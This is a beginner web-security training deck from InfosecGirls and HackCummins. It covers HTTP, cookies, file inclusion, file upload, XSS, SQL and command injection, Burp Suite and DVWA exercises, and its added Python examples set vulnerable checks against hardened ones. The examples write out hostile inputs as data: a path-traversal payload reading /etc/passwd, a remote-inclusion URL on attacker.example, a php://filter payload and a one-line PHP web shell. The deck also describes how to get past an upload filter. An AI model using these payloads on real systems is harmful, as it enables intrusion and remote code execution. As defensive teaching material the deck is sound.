Infosec girls training-hackcummins-college-jan-2020(v0.1)

INFOSECGIRLS TRAINING IN COLLABORATION WITH HACKCUMMINS
$WHOIS INFOSECGIRLS
• Community for women in Information Security.
Website
Twitter
Facebook
Linkedin
YouTube
Mailing List
WHY INFOSECGIRLS?
• We aim to bring more women into security and help them grow in the field.
TRAINERS
• Ishaq Mohammed, Appsec @ Qualys
• Shrutirupa Banerjiee, WAF Research @ Qualys
• Komal Armarkar, Spotlight Engineer @Crowdstrike
AGENDA:
Basics of Web Application
Architecture
Client Server Communication
HTTP/S
HTTP Methods
Status Codes
The WHY factor
Test Cases
Vulnerabilities
Demo
WEB APPLICATION ARCHITECTURE
HTTP/HTTPS
• HyperText Transfer Protocol (Secure)
• The request/response protocol used by the World Wide Web
• Defines how messages are formatted and transmitted, and what actions web servers and browsers take in response to each request
• HTTPS is HTTP carried over TLS: it encrypts the traffic in transit and lets the browser verify which server it is talking to. It does nothing about bugs in the application itself, which is why the vulnerabilities covered below work just as well over HTTPS.
METHODS
• GET: fetch a resource; parameters travel in the URL, so they end up in server logs, browser history and the Referer header
• POST: submit data in the request body (the normal choice for state-changing actions)
• PUT: create or replace the resource at the URL; dangerous when a server enables it without authentication
• OPTIONS: ask the server which methods it supports (also used for CORS preflight requests)
• AND MANY MORE…
STATUS CODES
• 1xx - informational (100 Continue)
• 2xx - success (200 OK)
• 3xx - redirection (302 Found; look at the Location header to see where you are being sent)
• 4xx - client error (401 Unauthorized, 403 Forbidden, 404 Not Found)
• 5xx - server error (500 Internal Server Error, often the first sign that injected input reached the backend)
HTTP HEADERS
COOKIE
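A worked example for the HTTP, status-code, header and cookie slides above. This is an addition to this page, not code from the original deck: it parses a constructed HTTP/1.1 response, classifies the status code into the 1xx..5xx classes listed above, and audits every Set-Cookie header for the HttpOnly, Secure and SameSite attributes a tester looks for. The response bytes, cookie names and values are made up for illustration.

```python
"""Parse a raw HTTP/1.1 response, classify its status code and audit the
Set-Cookie headers for the attributes a tester looks for.

Added example for the HTTP/status-code/header/cookie slides; the response
below is constructed for illustration, not captured from any real site."""

# Constructed sample response: a login that succeeds and issues two cookies.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Server: nginx\r\n"
    b"Location: /dashboard\r\n"
    b"Set-Cookie: PHPSESSID=3b1f0c9a; Path=/\r\n"
    b"Set-Cookie: remember=1; Path=/; HttpOnly; Secure; SameSite=Lax\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

STATUS_CLASSES = {1: "informational", 2: "success", 3: "redirection",
                  4: "client error", 5: "server error"}


def status_class(code):
    """Map a numeric status code to its 1xx..5xx class name."""
    return STATUS_CLASSES.get(code // 100, "unknown")


def parse_response(raw):
    """Split a raw response into status line, headers and body.

    Header names are case-insensitive, so they are lowercased; a header that
    repeats (Set-Cookie does) is kept as a list of values."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    version, code, reason = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return {"version": version, "status": int(code), "reason": reason,
            "headers": headers, "body": body}


def audit_cookie(set_cookie_value):
    """Return (cookie name, list of missing protections) for one Set-Cookie value."""
    parts = [p.strip() for p in set_cookie_value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower(): p for p in parts[1:]}
    findings = []
    if "httponly" not in attrs:
        findings.append("no HttpOnly: readable by injected script (XSS)")
    if "secure" not in attrs:
        findings.append("no Secure: also sent over plain HTTP")
    if "samesite" not in attrs:
        findings.append("no SameSite: sent on cross-site requests (CSRF)")
    return name, findings


def audit_response(raw):
    """Parse the response and audit every cookie it sets."""
    resp = parse_response(raw)
    report = {"status": resp["status"],
              "class": status_class(resp["status"]),
              "cookies": {}}
    for value in resp["headers"].get("set-cookie", []):
        name, findings = audit_cookie(value)
        report["cookies"][name] = findings
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(audit_response(SAMPLE_RESPONSE), indent=2))
```

In the constructed response the session cookie PHPSESSID is the one that matters and it is the one with no flags at all; the same audit run against the raw response in Burp's Proxy history is a quick first check on any login page.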
HOW DO WE VIEW THE SOURCE CODE??
• View-source
• Inspect element
VIEW-SOURCE
INSPECT ELEMENT
THE WHY FACTOR
WHY ARE WE TALKING ABOUT IT???
VULNERABILITIES TO BE COVERED TODAY
File inclusion
File upload
XSS reflected
XSS stored
SQL Injection
DEMO
FILE INCLUSION
• Local File Inclusion: user input selects which file on the server the application includes, so ../ sequences pull in files outside the intended directory (configuration files, /etc/passwd, log files)
• Remote File Inclusion: the same input also accepts a URL, so the server fetches and executes attacker-hosted code
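The include resolver below is an added example for the file inclusion slide, not DVWA's code or the deck's. It shows the vulnerable pattern (the page parameter joined straight onto a base directory) next to a hardened resolver with three independent checks: no URL scheme, the normalised path must stay under the base directory, and the page must be on an allowlist. The base directory, page names and payloads are constructed; paths are handled with posixpath so nothing on disk is touched and the result is the same on every OS.

```python
"""Local/remote file inclusion: the vulnerable resolver versus a hardened one.

Added example for the file inclusion slide; the base directory, page names
and payloads are constructed for illustration."""
import posixpath
from urllib.parse import urlsplit

WEB_ROOT = "/var/www/html/pages"                       # constructed base dir
PAGES = {"home.php", "about.php", "contact.php"}        # constructed allowlist


def include_vulnerable(page):
    """The classic bug: the user-supplied value is joined straight onto the
    base path, so '../' climbs out of it, and with remote inclusion enabled
    an 'http://' value makes the runtime fetch and run remote code."""
    return WEB_ROOT + "/" + page


def is_remote(page):
    """Any URL scheme (http, https, ftp, php, data, ...) marks a remote or
    stream-wrapper inclusion attempt."""
    return urlsplit(page).scheme != ""


def include_hardened(page):
    """Resolve the page safely or raise ValueError with the reason."""
    if is_remote(page):
        raise ValueError("remote/wrapper inclusion rejected: %r" % page)
    # normpath collapses '..' and '.' so the prefix test sees the real target.
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, page))
    if not resolved.startswith(WEB_ROOT + "/"):
        raise ValueError("path traversal rejected: %r" % page)
    name = posixpath.relpath(resolved, WEB_ROOT)
    if name not in PAGES:
        raise ValueError("page not on allowlist: %r" % page)
    return resolved


def classify_include(page):
    """Label an include request for a log line: 'ok' or the rejection reason."""
    try:
        include_hardened(page)
    except ValueError as exc:
        return str(exc).split(":")[0]
    return "ok"


# Constructed attacker inputs of the kind sent as ?page=...
LFI_PAYLOAD = "../../../../etc/passwd"
RFI_PAYLOAD = "http://attacker.example/shell.txt"
WRAPPER_PAYLOAD = "php://filter/convert.base64-encode/resource=index"
```

The allowlist is the check that actually matters: normalisation alone still lets the attacker read any file under the base directory, and a prefix test without normalisation is fooled by ../ sequences.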
FILE UPLOAD
• Uploading a malicious file (for example a PHP web shell) that the server stores where it will later be served or executed
• Can lead to Remote Code Execution when the upload lands in a web-accessible directory under an executable extension
XSS REFLECTED
• The malicious script travels in the request (usually a URL parameter) and the server echoes it straight back into the response without encoding, so it runs in the victim's browser
• You trick a user into clicking a crafted link; the script then runs with the user's session and can steal cookies that lack the HttpOnly flag
XSS STORED
• The malicious script is submitted to the application (comment, profile field, guestbook entry) and persisted, for example in the database
• Every user who later views that page is served the script, so no crafted link is needed
SQL INJECTION
• User input is concatenated into a SQL statement, so attacker-supplied quotes and keywords change the query the database executes
• Used to bypass logins and to gain unauthorized access to the sensitive data in the database
COMMAND INJECTION
• User input is passed into an operating-system command (for example a ping utility), so shell metacharacters such as ; | && let the attacker append commands of their own
• Leads directly to remote code execution, i.e. a shell on the server with the privileges of the web server process
LET'S DEEP DIVE A BIT MORE!!!
WHAT IS A PROXY??
• An intercepting proxy sits between the browser and the server, so every request and response can be viewed and modified before it is forwarded
BURPSUITE
INITIAL SETUP AND CONFIGURATION
SPIDER – crawls the application to map its pages, forms and parameters
SCANNER – automated vulnerability checks against the mapped requests
REPEATER – resend a single request by hand, editing it each time
INTRUDER – automated fuzzing of chosen positions in a request (payload lists, brute force)
DECODER – encode, decode and hash data (URL, Base64, hex, HTML)
LET’S EXPLOIT SOME VULNERABILITIES USING BURP!!!
FILE UPLOAD – MEDIUM (DVWA security level)
CSRF – LOW (DVWA security level)
FILE UPLOAD
• Let’s bypass the mitigations: at the medium level the server only checks the client-supplied Content-Type header and the file size, both of which the attacker controls, so a PHP file relabelled as image/jpeg in Burp goes through
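One added example serving both the file upload overview slide and the "bypass the mitigations" exercise; it is an illustration, not DVWA's PHP or the deck's code. The weak check mirrors the medium level (trust the Content-Type header and the size), and the hardened check ignores the header, requires an allowed extension that agrees with the file's own magic bytes, and stores the file under a server-chosen random name. The sample PNG header and web shell bytes are constructed.

```python
"""Upload validation that trusts the request versus a check that cannot be
satisfied by editing the request in Burp.

Added example for the file upload slides; the sample files are constructed
byte strings and the hardened check is an illustration, not DVWA's code."""
import os
import secrets

MAX_SIZE = 100_000
IMAGE_MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png"}
EXT_FOR_KIND = {"jpg": {"jpg", "jpeg"}, "png": {"png"}}


def accept_medium(filename, content_type, data):
    """The weak check: trusts the Content-Type header sent by the client."""
    return content_type in ("image/jpeg", "image/png") and len(data) < MAX_SIZE


def sniff_image_type(data):
    """Return 'jpg'/'png' from the file's own magic bytes, else None."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def accept_hardened(filename, content_type, data):
    """Ignore the header; require a known extension AND matching magic bytes,
    and never keep the client's filename. Returns the stored name or None."""
    if len(data) >= MAX_SIZE:
        return None
    ext = os.path.splitext(os.path.basename(filename))[1].lstrip(".").lower()
    kind = sniff_image_type(data)
    if kind is None or ext not in EXT_FOR_KIND[kind]:
        return None
    # Random server-chosen name with the extension derived from the content,
    # so 'shell.php' or 'shell.php.jpg' never lands on disk under a name the
    # web server would execute.
    return "%s.%s" % (secrets.token_hex(8), kind)


# Constructed uploads: a PNG header with padding, and a PHP web shell.
GOOD_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
WEB_SHELL = b"<?php system($_GET['cmd']); ?>"
```

Magic-byte checks are not a complete answer on their own: a polyglot that starts with a valid PNG header and carries PHP after it passes the content check. The random name with a non-executable extension, plus storing uploads outside the web root or in a directory where execution is disabled, is what stops such a file from becoming a shell.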
CSRF
• Cross Site Request Forgery
• Targets authenticated users: a page the attacker controls makes the victim's browser send a state-changing request (for example a password change) to the vulnerable site; the browser attaches the session cookie automatically, so the server treats it as the user's own action
REFERENCES:
• Damn Vulnerable Web Application (DVWA)
• HTTP
• Learn web development
RESOURCES
• So, you want to work in security?
• Roadmap for Application Security
• Getting Started in Offensive Security
• BREAKING INTO INFOSEC: A BEGINNERS CURRICULUM
• OWASP Foundation
• OWASP Top 10 – 2017
• CodePath Web Security Guides
• Awesome-Hacking
• High-Level Approaches for Finding Vulnerabilities
TRAINER CONTACT
• Shrutirupa Banerjiee - https://twitter.com/freak_crypt
• Komal Armarkar - https://twitter.com/n0th1n3_00X
• Ishaq Mohammed - https://twitter.com/security_prince